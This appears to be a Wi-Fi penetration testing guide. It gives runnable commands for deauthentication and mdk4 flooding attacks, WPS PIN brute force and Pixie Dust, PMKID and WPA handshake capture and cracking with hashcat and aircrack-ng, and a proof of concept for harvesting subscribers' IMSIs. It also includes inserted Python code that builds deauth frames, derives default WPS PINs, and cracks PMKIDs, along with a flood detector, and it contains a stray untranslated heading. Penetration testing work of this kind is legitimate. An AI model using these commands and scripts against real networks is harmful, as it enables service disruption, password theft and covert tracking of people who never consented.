Pentesting Wifi


Basic Wifi commands

bash
ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Tools

Hijacker & NexMon (internal Android Wi-Fi)

Enable Nexmon Monitor And Injection On Android

EAPHammer

bash
git clone https://github.com/s0lst1c3/eaphammer.git
cd eaphammer
./kali-setup

Airgeddon

bash
mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

Run airgeddon with docker

bash
docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

Source: https://github.com/v1s1t0r1sh3r3/airgeddon/wiki/Docker%20Linux

wifiphisher

It can perform Evil Twin, KARMA and Known Beacons attacks and then use a phishing template to obtain the network's real password or capture social network credentials.

bash
git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

This tool automates WPS/WEP/WPA-PSK attacks. It will automatically:

  • Put the interface in monitor mode
  • Scan for possible networks and let you select the victim(s)
  • If WEP: launch WEP attacks
  • If WPA-PSK:
    • If WPS: Pixie Dust attack and brute-force attack (be careful, the brute-force attack can take a long time). Note that it won't try the null PIN or database/generated PINs.
    • Try to capture the PMKID from the AP to crack it
    • Try to deauthenticate clients of the AP to capture a handshake
    • If a PMKID or handshake was obtained, try to brute-force it using the top 5000 passwords.

Attacks Summary

  • DoS
    • Deauthentication/disassociation -- Disconnect everyone (or a specific ESSID/Client)
    • Random fake APs -- Hide nets, possibly crash scanners
    • Overload AP -- Try to kill the AP (usually not very useful)
    • WIDS -- Play with the IDS
    • TKIP, EAPOL -- Some specific attacks to DoS some APs
  • Cracking
    • Crack WEP (several tools and methods)
    • WPA-PSK
      • WPS pin "Brute-Force"
      • WPA PMKID bruteforce
      • [DoS +] WPA handshake capture + Cracking
    • WPA-MGT
      • Username capture
      • Bruteforce Credentials
  • Evil Twin (with or without DoS)
    • Open Evil Twin [+ DoS] -- Useful to capture captive portal creds and/or perform LAN attacks
    • WPA-PSK Evil Twin -- Useful for network attacks if you know the password
    • WPA-MGT -- Useful to capture company credentials
  • KARMA, MANA, Loud MANA, Known beacon
    • + Open -- Useful to capture captive portal creds and/or perform LAN attacks
    • + WPA -- Useful to capture WPA handshakes

DOS

Deauthentication Packets

Description from here:

Deauthentication attacks, a prevalent method in Wi-Fi hacking, involve forging "management" frames to forcefully disconnect devices from a network. These unencrypted packets deceive clients into believing they are from the legitimate network, enabling attackers to collect WPA handshakes for cracking purposes or to persistently disrupt network connections. This tactic, alarming in its simplicity, is widely used and has significant implications for network security.

Deauthentication using Aireplay-ng

bash
aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

  • -0 means deauthentication
  • 0 is the number of deauths to send; 0 means send them continuously (use 1 or another small number for a single burst)
  • -a 00:14:6C:7E:40:80 is the MAC address of the access point
  • -c 00:0F:B5:34:30:30 is the MAC address of the client to deauthenticate; if omitted, a broadcast deauthentication is sent (does not always work)
  • ath0 is the interface name

Disassociation Packets

Disassociation packets, similar to deauthentication packets, are a type of management frame used in Wi-Fi networks. They are used to break the connection between a device (such as a laptop or smartphone) and an access point (AP). The main difference between disassociation and deauthentication lies in their usage scenarios. While an AP sends deauthentication packets to explicitly remove rogue devices from the network, disassociation packets are typically sent when the AP is shutting down, restarting or relocating and therefore needs to disconnect all associated devices.

This attack can be performed with mdk4 (mode "d"):

bash
# -c <channel>
# -b victim_client_mac.txt contains the MAC addresses of the devices to kick
# -E WifiName is the ESSID of the network
# -B BSSID is the BSSID of the AP
# These and other parameters are optional: you can give only the ESSID and mdk4 will automatically search for it, wait for clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F
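The frame layout both tools above rely on, as an added example that is not code from aireplay-ng or mdk4: it builds deauth and disassoc frames from constructed addresses (the AP and client MACs of the aireplay-ng example), parses them back, and runs a small detector that flags the per-BSSID burst a deauth flood leaves in a capture. The frame bytes and timestamps are constructed in the file; nothing is transmitted.

```python
"""Build, parse and flag 802.11 deauthentication/disassociation frames.

Added example (not from the original page or any tool it mentions). The
frames below are constructed in this file; no radio is touched. Layout
follows IEEE 802.11 management frames: 2-byte Frame Control, 2-byte
Duration, three 6-byte addresses, 2-byte Sequence Control, then a frame
body that for both subtypes is a single 2-byte little-endian reason code.
"""
import struct
from collections import defaultdict

SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
REASON_CLASS3_NONASSOC = 7  # reason code aireplay-ng puts in its deauth frames
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_to_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str,
                     reason: int = REASON_CLASS3_NONASSOC, seq: int = 0) -> bytes:
    """Return a raw deauth (0x0C) or disassoc (0x0A) frame.

    Frame Control byte 0 = subtype<<4 | type<<2 | version; type 0 = management,
    so a deauth starts with 0xC0 and a disassoc with 0xA0. Flags byte is 0.
    """
    fc = bytes([(subtype << 4) | 0x00, 0x00])
    duration = struct.pack("<H", 0)
    header = fc + duration + mac_to_bytes(dst) + mac_to_bytes(src) + mac_to_bytes(bssid)
    header += struct.pack("<H", seq << 4)  # fragment 0, sequence number in the upper 12 bits
    return header + struct.pack("<H", reason)


def parse_mgmt_frame(frame: bytes):
    """Return (subtype, dst, src, bssid, reason) or None if not a deauth/disassoc."""
    if len(frame) < 26:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    if ftype != 0 or subtype not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        return None
    dst = bytes_to_mac(frame[4:10])
    src = bytes_to_mac(frame[10:16])
    bssid = bytes_to_mac(frame[16:22])
    reason = struct.unpack("<H", frame[24:26])[0]
    return subtype, dst, src, bssid, reason


def detect_flood(timed_frames, window_s=1.0, threshold=10):
    """Flag BSSIDs that emit more than `threshold` deauth/disassoc frames in any
    `window_s` sliding window. `timed_frames` yields (t_seconds, raw_frame).
    Returns {bssid: peak_count} for offenders only."""
    times = defaultdict(list)
    for t, raw in timed_frames:
        parsed = parse_mgmt_frame(raw)
        if parsed:
            times[parsed[3]].append(t)
    offenders = {}
    for bssid, ts in times.items():
        ts.sort()
        start = 0
        peak = 0
        for end, t in enumerate(ts):
            while t - ts[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak > threshold:
            offenders[bssid] = peak
    return offenders


def constructed_capture():
    """Constructed sample: one legitimate disassoc from the AP, then a burst of 64
    broadcast deauths spoofing AP 00:14:6c:7e:40:80 (an aireplay-style flood)."""
    ap = "00:14:6c:7e:40:80"
    sta = "00:0f:b5:34:30:30"
    frames = [(0.0, build_mgmt_frame(SUBTYPE_DISASSOC, sta, ap, ap, reason=8))]
    frames += [(1.0 + i * 0.01, build_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, ap, ap, seq=i))
               for i in range(64)]
    return frames


if __name__ == "__main__":
    for t, raw in constructed_capture()[:3]:
        print(t, parse_mgmt_frame(raw))
    print(detect_flood(constructed_capture()))
```

The detector is the part worth carrying over to a WIDS: a legitimate AP rarely sends more than a handful of deauth/disassoc frames per second, while both aireplay-ng and mdk4 emit dozens, so a short sliding window keyed on BSSID separates the two.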

More DoS attacks with mdk4

From here.

ATTACK MODE b: Beacon Flooding

It sends beacon frames to show fake APs to clients. This can sometimes crash network scanners and even drivers!

bash
# -a Use also non-printable characters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

Sending authentication frames to all accessible Access Points (APs) within range can overload them, especially when many clients are involved. This heavy traffic can lead to system instability, causing some APs to freeze or even reset.

bash
# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat packets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Probing Access Points (APs) checks whether an SSID is properly revealed and confirms the AP's range. This technique, combined with brute-forcing hidden SSIDs with or without a wordlist, helps identify and access concealed networks.

ATTACK MODE m: Michael Countermeasures Exploitation

Sending random or duplicate packets to different QoS queues can trigger Michael Countermeasures on TKIP APs, shutting the AP down for about a minute. This makes it an effective DoS (Denial of Service) tactic.

bash
# -t <BSSID> of a TKIP AP
# -j use intelligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start and Logoff Packet Injection

Flooding an AP with EAPOL Start frames creates fake sessions, overwhelming the AP and blocking legitimate clients. Alternatively, injecting fake EAPOL Logoff messages forcibly disconnects clients; both methods effectively disrupt network service.

bash
# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: Shambulio kwa IEEE 802.11s mesh networks

Various attacks against link management and routing in mesh networks.

ATTACK MODE w: WIDS Confusion

Cross-connecting clients to multiple WDS nodes or fake rogue APs can manipulate Intrusion Detection and Prevention Systems, creating confusion and potential system abuse.

bash
# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mdk4 wlan0mon w -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

A packet fuzzer featuring diverse packet sources and a comprehensive set of modifiers for packet manipulation.

Airgeddon

Airgeddon offers most of the attacks proposed in the previous comments:

WPS

WPS (Wi-Fi Protected Setup) simplifies the process of connecting devices to a router, speeding up and easing setup for networks encrypted with WPA or WPA2 Personal. It does not apply to WEP security, which is easily compromised. WPS uses an 8-digit PIN that is validated in two halves, making it susceptible to brute-force attacks because of the limited number of combinations (11,000 possibilities).

WPS Bruteforce

There are 2 main tools to perform this action: Reaver and Bully.

  • Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.
  • Bully is a new implementation of the WPS brute force attack, written in C. It has several advantages over the original reaver code: fewer dependencies, improved memory and CPU performance, correct handling of endianness, and a more robust set of options.

The attack exploits the WPS PIN's vulnerability, particularly the exposure of the first four digits and the last digit's role as a checksum, which eases the brute-force attack. However, defences against brute-force attacks, such as blocking the MAC addresses of aggressive attackers, demand MAC address rotation to continue the attack.

Upon obtaining the WPS PIN with tools like Bully or Reaver, the attacker can deduce the WPA/WPA2 PSK, ensuring persistent network access.

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N [-L -d 2] -vv
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

Smart Brute Force

This refined approach targets WPS PINs using known vulnerabilities:

  1. Pre-discovered PINs: Use a database of known PINs linked to specific manufacturers known to use uniform WPS PINs. This database correlates the first three octets of MAC addresses with likely PINs for these manufacturers.
  2. PIN Generation Algorithms: Use algorithms like ComputePIN and EasyBox, which calculate WPS PINs based on the AP's MAC address. The Arcadyan algorithm additionally requires a device ID, adding a layer to the PIN generation process.
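Why the keyspace is 11,000 and what a MAC-derived PIN looks like, as an added example (not reaver, bully or airgeddon code): the WPS checksum digit, the two-half attempt count, and a ComputePIN-style default PIN derived from the BSSID used in the commands above. The ComputePIN derivation (last 24 bits of the BSSID mod 10^7 plus checksum) is assumed here to match the published algorithm; check its output against your tool's PIN database before relying on it.

```python
"""WPS PIN arithmetic: checksum digit, the two-half keyspace and a MAC-derived
default PIN. Added example, not code from reaver, bully or airgeddon.

The 8-digit PIN is verified by the AP in two halves: the first 4 digits
(10^4 options) are confirmed before the last 4, and the 8th digit is a
checksum of the first 7, so the second half has only 10^3 options. That is
the 10^4 + 10^3 = 11,000 attempts quoted above.
"""


def wps_checksum(first7: int) -> int:
    """Checksum digit from the WPS spec: weights 3,1,3,1,... from the right."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])


def bruteforce_keyspace() -> int:
    """Worst-case attempts when the AP confirms each half separately."""
    first_half = 10 ** 4    # digits 1-4, verified on their own
    second_half = 10 ** 3   # digits 5-7 free, digit 8 fixed by the checksum
    return first_half + second_half


def compute_pin(bssid: str) -> str:
    """ComputePIN-style default PIN: last 24 bits of the BSSID mod 10^7, plus
    checksum. Assumption: mirrors the widely published ZhaoChunsheng
    derivation; verify against your tool's own PIN database."""
    last24 = int(bssid.replace(":", "")[-6:], 16)
    first7 = last24 % 10_000_000
    return f"{first7:07d}{wps_checksum(first7)}"


def candidate_pins(bssid: str):
    """Order a smart brute force would try PINs for this AP: the MAC-derived PIN,
    the well-known default 12345670, then the full checksum-valid keyspace.
    A generator, so the caller stops at the first PIN the AP accepts."""
    seen = set()
    for pin in (compute_pin(bssid), "12345670"):
        if pin not in seen:
            seen.add(pin)
            yield pin
    for first7 in range(10_000_000):
        pin = f"{first7:07d}{wps_checksum(first7)}"
        if pin not in seen:
            yield pin


if __name__ == "__main__":
    print(bruteforce_keyspace())                # 11000
    print(compute_pin("00:C0:CA:78:B1:37"))     # 79096874
    print(is_valid_wps_pin("12345670"))         # True
```

Note the full keyspace of checksum-valid PINs is 10^7, not 11,000: the reduction only exists because the AP's M4/M6 responses reveal whether each half was correct, which is also why lockout after a few failed halves (and the MAC rotation mentioned above) matters so much in practice.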

WPS Pixie Dust attack

Dominique Bongard discovered a flaw in some Access Points (APs) concerning the creation of secret codes, known as nonces (E-S1 and E-S2). If these nonces can be figured out, cracking the AP's WPS PIN becomes easy. The AP reveals the PIN within a special code (hash) to prove it is legitimate and not a fake (rogue) AP. These nonces are essentially the "keys" to unlocking the "safe" that holds the WPS PIN. More on this can be found here.

In simple terms, the issue is that some APs didn't use random enough keys to encrypt the PIN during the connection process. This makes the PIN vulnerable to being guessed from outside the network (offline brute force attack).

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

If you don't want to switch the device to monitor mode, or reaver and bully have some problem, you can try OneShot-C. This tool can perform the Pixie Dust attack without having to switch to monitor mode.

bash
./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin attack

Some poorly designed systems even let a Null PIN (an empty or nonexistent PIN) grant access, which is quite unusual. The tool Reaver is capable of testing this vulnerability, unlike Bully.

bash
reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

All the proposed WPS attacks can be easily performed using airgeddon.

  • 5 and 6 let you try your custom PIN (if you have any)
  • 7 and 8 perform the Pixie Dust attack
  • 13 lets you test the NULL PIN
  • 11 and 12 will recollect the PINs related to the selected AP from available databases and generate possible PINs using: ComputePIN, EasyBox and optionally Arcadyan (recommended, why not?)
  • 9 and 10 will test every possible PIN

WEP

So broken and unused nowadays. Just know that airgeddon has a WEP option called "All-in-One" to attack this kind of protection. More tools offer similar options.



WPA/WPA2 PSK

PMKID

In 2018, hashcat revealed a new attack method, unique because it only needs a single packet and doesn't require any clients to be connected to the target AP; just interaction between the attacker and the AP.

Many modern routers add an optional field to the first EAPOL frame during association, known as the Robust Security Network (RSN) information element. This includes the PMKID.

As the original post explains, the PMKID is created using known data:

bash
PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

Given that the "PMK Name" is constant, we know the BSSID of the AP and the station, and the PMK is identical to the one from a full 4-way handshake, hashcat can use this information to crack the PSK and recover the passphrase!

To gather this information and brute-force the password locally you can do:

bash
airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
# flags for the hcxdumptool version used here; recent releases changed the output flag to -w and dropped --enable_status, check hcxdumptool -h
hcxdumptool -o /tmp/attack.pcapng -i wlan0mon --enable_status=1

bash
#You can also obtain PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

The PMKIDs captured will be shown in the console and also saved in /tmp/attack.pcapng.
Now, convert the capture to hashcat/john format and crack it:

bash
hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Please note that the correct hash format contains 4 parts separated by "*", like: 4017733ca8db33a1479196c2415173be*b808d7b83cfa*a4a6a9a5aae7*566f6461666f6e65436f6e6e6563743034383131343838 (PMKID, AP MAC, station MAC, ESSID in hex). If yours only contains 3 parts, it is invalid (the PMKID capture wasn't valid). Newer hcxtools releases replace hcxpcaptool with hcxpcapngtool (hcxpcapngtool -o hashes.22000 /tmp/attack.pcapng), which writes the hashcat 22000 format covering both PMKIDs and EAPOL handshakes (hashcat -m 22000).
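The derivation and the hash format above, as an added example in Python (not hashcat, hcxtools or eaphammer code): it derives the PMK, computes the PMKID with the formula given, writes and validates the 4-field 16800 line, and cracks a constructed sample against a tiny wordlist. The SSID, station MAC and passphrase are constructed for the example; the AP MAC is the one from the eaphammer command above.

```python
"""PMKID derivation, hashcat 16800 line format and a small offline crack.
Added example: not hashcat, hcxtools or eaphammer code. SSID, passphrase and
station MAC are constructed here; no capture file is read.

  PMK   = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes)
  PMKID = HMAC-SHA1(PMK, "PMK Name" | MAC_AP | MAC_STA)[:16]
"""
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: the PMK is PBKDF2 over the passphrase, salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: str, mac_sta: str) -> bytes:
    """HMAC-SHA1-128 from the formula above: the first 16 bytes of HMAC-SHA1."""
    data = (b"PMK Name"
            + bytes.fromhex(mac_ap.replace(":", ""))
            + bytes.fromhex(mac_sta.replace(":", "")))
    return hmac.new(pmk, data, hashlib.sha1).digest()[:16]


def to_hashcat_16800(pmkid: bytes, mac_ap: str, mac_sta: str, ssid: str) -> str:
    """PMKID*MAC_AP*MAC_STA*ESSID_hex, the 4-field line hashcat -m 16800 expects."""
    return "*".join([pmkid.hex(),
                     mac_ap.replace(":", "").lower(),
                     mac_sta.replace(":", "").lower(),
                     ssid.encode().hex()])


def parse_hashcat_16800(line: str):
    """Reject lines with the wrong field count (the 3-field case the text warns about)."""
    parts = line.strip().split("*")
    if len(parts) != 4 or len(parts[0]) != 32:
        raise ValueError(f"invalid 16800 line: expected 4 fields, got {len(parts)}")
    pmkid, ap, sta, essid_hex = parts

    def fmt(h):
        return ":".join(h[i:i + 2] for i in range(0, 12, 2))

    return bytes.fromhex(pmkid), fmt(ap), fmt(sta), bytes.fromhex(essid_hex).decode()


def crack_pmkid(line: str, wordlist):
    """One PBKDF2 + one HMAC per candidate; no client traffic needed, only the PMKID."""
    pmkid, mac_ap, mac_sta, ssid = parse_hashcat_16800(line)
    for word in wordlist:
        if compute_pmkid(derive_pmk(word, ssid), mac_ap, mac_sta) == pmkid:
            return word
    return None


# Constructed sample "capture": the AP from the eaphammer command above, a made-up
# station and a made-up passphrase that the crack below should recover.
SAMPLE_SSID = "NameOfMyWifi"
SAMPLE_AP = "70:4C:A5:F8:9A:C1"
SAMPLE_STA = "00:0F:B5:34:30:30"
SAMPLE_PASSPHRASE = "mitmwifi123"
SAMPLE_LINE = to_hashcat_16800(
    compute_pmkid(derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_SSID), SAMPLE_AP, SAMPLE_STA),
    SAMPLE_AP, SAMPLE_STA, SAMPLE_SSID)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print(crack_pmkid(SAMPLE_LINE, ["password", "letmein", "mitmwifi123"]))
```

The cost per guess is dominated by the 4096-iteration PBKDF2, exactly as it is for a captured 4-way handshake; the PMKID attack changes what you need to capture, not how hard the passphrase is to guess.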

Note that hcxdumptool also captures handshakes (something like this will appear: MP:M1M2 RC:63258 EAPOLTIME:17091). You can convert the handshakes to hashcat/john format using cap2hccapx

bash
tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx /tmp/att.pcap /tmp/pmkid.hccapx ["Filter_ESSID"]
hccap2john /tmp/pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

I have noticed that some handshakes captured with this tool couldn't be cracked even knowing the correct password. I would recommend capturing handshakes also in the traditional way if possible, or capturing several of them with this tool.

Capturing the handshake

An attack on WPA/WPA2 networks can be executed by capturing a handshake and attempting to crack the password offline. This process involves monitoring the communication of a specific network and BSSID on a particular channel. Here's a streamlined guide:

  1. Identify the BSSID, channel, and a connected client of the target network.
  2. Use airodump-ng to monitor the network traffic on the specified channel and BSSID, hoping to capture a handshake. The command will look like this:
bash
airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap
  3. To increase the chance of capturing a handshake, momentarily disconnect the client from the network to force a re-authentication. This can be done using the aireplay-ng command, which sends deauthentication packets to the client:
bash
aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

Note that as the client was deauthenticated it could try to connect to a different AP or, in other cases, to a different network.

Once the handshake indicator appears in airodump-ng (a "WPA handshake: <BSSID>" tag in the header line of the output), the handshake has been captured and you can stop listening:

Once the handshake is captured you can crack it with aircrack-ng:

bash
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

Check if the handshake is in the file

aircrack

bash
aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was captured

tshark

bash
tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

bash
cowpatty -r psk-01.cap -s "ESSID" -f -

If this tool finds an incomplete handshake of an ESSID before the completed one, it won't detect the valid one.

pyrit

bash
apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

In enterprise WiFi setups, you will encounter various authentication methods, each providing different levels of security and management features. When you use tools like airodump-ng to inspect network traffic, you might notice identifiers for these authentication types. Some common methods include:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

  1. EAP-GTC (Generic Token Card):
  • This method supports hardware tokens and one-time passwords within EAP-PEAP. Unlike MSCHAPv2, it does not use a peer challenge and sends the password in plaintext inside the tunnel, so a rogue AP that terminates the TLS tunnel receives the password itself; this is the basis of GTC downgrade attacks.
  2. EAP-MD5 (Message Digest 5):
  • Involves sending the MD5 hash of the password from the client. NOT recommended due to vulnerability to dictionary attacks, lack of server authentication, and inability to generate session-specific keys.
  3. EAP-TLS (Transport Layer Security):
  • Uses both client-side and server-side certificates for authentication and can dynamically generate user- and session-based keys (historically, WEP keys) to secure communications.
  4. EAP-TTLS (Tunneled Transport Layer Security):
  • Provides mutual authentication through an encrypted tunnel, along with a method to derive dynamic, per-user, per-session keys. It requires only server-side certificates, with clients using credentials.
  5. PEAP (Protected Extensible Authentication Protocol):
  • Works like EAP by creating a TLS tunnel for protected communication. It allows the use of weaker authentication protocols on top of EAP thanks to the protection offered by the tunnel.
  • PEAP-MSCHAPv2: Often referred to as PEAP, it combines the vulnerable MSCHAPv2 challenge/response mechanism with a protective TLS tunnel.
  • PEAP-EAP-TLS (or PEAP-TLS): Similar to EAP-TLS but initiates a TLS tunnel before exchanging certificates, offering an additional layer of security.

You can find more information about these authentication methods here and here.

Username Capture

Reading https://tools.ietf.org/html/rfc3748#page-27 it looks like if you are using EAP the "Identity" messages must be supported, and the username is going to be sent in clear in the "Response Identity" messages.

Even using one of the most secure authentication methods, PEAP-EAP-TLS, it is possible to capture the username sent in the EAP protocol. To do so, capture an authentication exchange (start airodump-ng on the channel and wireshark on the same interface) and filter the packets by eapol.
Inside the "Response, Identity" packet, the client's username will appear.

Anonymous Identities

Identity hiding is supported by both EAP-PEAP and EAP-TTLS. In the context of a WiFi network, an EAP-Identity request is typically initiated by the access point (AP) during the association process. To ensure the protection of user anonymity, the response from the EAP client on the user's device contains only the essential information required for the initial RADIUS server to process the request. This concept is illustrated through the following scenarios:

  • EAP-Identity = anonymous
    • In this scenario, all users employ the pseudonymous "anonymous" as their user identifier. The initial RADIUS server functions as either an EAP-PEAP or EAP-TTLS server, responsible for managing the server side of the PEAP or TTLS protocol. The inner (protected) authentication method is then either handled locally or delegated to a remote (home) RADIUS server.
  • EAP-Identity = anonymous@realm_x
    • In this situation, users from different realms conceal their identities while indicating their respective realms. This allows the initial RADIUS server to proxy the EAP-PEAP or EAP-TTLS requests to RADIUS servers in their home realms, which act as the PEAP or TTLS server. The initial RADIUS server operates solely as a RADIUS relay node.
    • Alternatively, the initial RADIUS server may function as the EAP-PEAP or EAP-TTLS server and either handle the protected authentication method or forward it to another server. This option facilitates the configuration of distinct policies for various realms.

In EAP-PEAP, once the TLS tunnel is established between the PEAP server and the PEAP client, the PEAP server initiates an EAP-Identity request and transmits it through the TLS tunnel. The client responds to this second EAP-Identity request by sending an EAP-Identity response containing the user's true identity through the encrypted tunnel. This approach effectively prevents the revelation of the user's actual identity to anyone eavesdropping on the 802.11 traffic.

EAP-TTLS follows a slightly different procedure. With EAP-TTLS, the client typically authenticates using PAP or CHAP, secured by the TLS tunnel. In this case, the client includes a User-Name attribute and either a Password or CHAP-Password attribute in the initial TLS message sent after tunnel establishment.

Regardless of the protocol chosen, the PEAP/TTLS server obtains knowledge of the user's true identity after the TLS tunnel has been established. The true identity can be represented as user@realm or simply user. If the PEAP/TTLS server is also responsible for authenticating the user, it now possesses the user's identity and proceeds with the authentication method protected by the TLS tunnel. Alternatively, the PEAP/TTLS server may forward a new RADIUS request to the user's home RADIUS server. This new RADIUS request omits the PEAP or TTLS protocol layer. In cases where the protected authentication method is EAP, the inner EAP messages are transmitted to the home RADIUS server without the EAP-PEAP or EAP-TTLS wrapper. The User-Name attribute of the outgoing RADIUS message contains the user's true identity, replacing the anonymous User-Name from the incoming RADIUS request. When the protected authentication method is PAP or CHAP (supported only by TTLS), the User-Name and other authentication attributes extracted from the TLS payload are substituted in the outgoing RADIUS message, displacing the anonymous User-Name and TTLS EAP-Message attributes found in the incoming RADIUS request.

For more info check https://www.interlinknetworks.com/app_notes/eap-peap.htm

SIM-based EAP (EAP-SIM/EAP-AKA) identity leakage (IMSI exposure)

SIM-based Wi‑Fi authentication using EAP‑SIM/EAP‑AKA over 802.1X can leak the permanent subscriber identifier (IMSI) in cleartext during the unauthenticated identity phase if the deployment does not enforce pseudonyms/protected identities or a TLS tunnel around the inner EAP.

Where the leak happens (high level):

  • 802.11 association completes to the SSID (often carrier offload SSIDs such as FreeWifi_secure, eduroam-like operator realms, etc.).
  • The authenticator sends EAP-Request/Identity.
  • Vulnerable clients answer EAP-Response/Identity with their permanent identity = IMSI formatted as a 3GPP NAI, before any protection is in place.
  • Example NAI: 20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org
  • Anyone passively sniffing RF can read that frame. No 4-way handshake or TLS keying is required.

Quick PoC: passive IMSI harvesting on EAP‑SIM/AKA networks lacking identity privacy

bash
# 1) Enable monitor mode
airmon-ng start wlan0

# 2) Optional: lock channel to the target BSS
airodump-ng wlan0mon --essid <SSID>

# 3) Capture 802.1X/EAP frames
# Wireshark display filters:
#   eap || eapol
#   (identity specifically): eap.code == 2 && eap.type == 1
# Kismet: add source wlan0mon; enable 802.1X/EAP views
# tcpdump (pcap capture):
#   tcpdump -i wlan0mon -s 0 -w eapsim_identity.pcap

# 4) Wait for a device to auto-connect to the SSID
# 5) Inspect the first EAP-Response/Identity frame
# Expected: ASCII NAI containing IMSI, e.g.
#   20815XXXXXXXXXX@wlan.mnc015.mcc208.3gppnetwork.org

Notes:

  • Works before any TLS tunnel if the deployment uses bare EAP‑SIM/AKA without protected identity/pseudonyms.
  • The exposed value is a permanent identifier bound to the subscriber's SIM; harvesting at scale enables long-term tracking and downstream telecom abuse.
